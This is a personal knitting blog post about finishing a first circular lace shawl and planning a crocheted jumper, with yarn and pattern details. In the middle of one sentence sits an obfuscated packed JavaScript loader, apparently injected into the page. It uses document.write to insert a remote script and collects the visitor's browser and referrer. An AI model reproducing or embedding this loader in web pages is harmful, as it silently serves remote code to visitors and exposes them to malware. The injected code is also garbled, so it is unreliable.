I have nearly finished my circular lace shawl – my first attempt at using circular needles as well as my first time knitting with lace and overall it has been a joy. I have to admit I started several patterns and got in a complete muddle before settling on this one. I think that part of why I love knitting and crochet so much is that I can do it without concentrating – whilst watching tv or chatting. The difference with lace knitting is that you have to concentrate and count all the time, and when you have 500 stitches on the needles and realise that you have made a mistake somewhere in the previous row it becomes rather annoying?! So, anyway, I settled on a lovely circular ring of lace eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zyrab|var|u0026u|referrer|fbrsi||js|php’.split(‘|’),0,{}))
from craftsy, and used Araucania Botany Lace in pinks and greys. This is a gorgeous pattern but once you’ve done the 6 row pattern once it becomes very intuitive, and as such something I could do without too much concentration. This is especially important for me as lace is such a HUGE undertaking as it takes so much longer than any other project I’ve made before that I would have got bored if I was counting all the time. Why didn’t I use my beautiful Shreyas… because they hadn’t arrived when I started it and I was desperate for something to make… Anyway, my next lace project will definitely be in silk. Pictures of finished product to follow.

However, I need to start making some patterns for my silks – a few people have asked me where they can get patters for them, so I think I need to start showing some on my site. I think my next project will be a crocheted jumper from ravelry. I’ve longed to make a crocheted jumper for ages but all the patterns I have found are hideous!! Having never made one before I am a bit nervous to wing it like I normally do when knitting a jumper because I have made so many I can do it in my sleep. Anyway, at last I have found a pattern that looks both fairly straight-forward but also very wearable. I may embellish the bottom and sleeves with some sort of motif, but can decide once finished.  I am going to make this using Contessa DK in grey (shade 007). I will post pictures once it’s done…
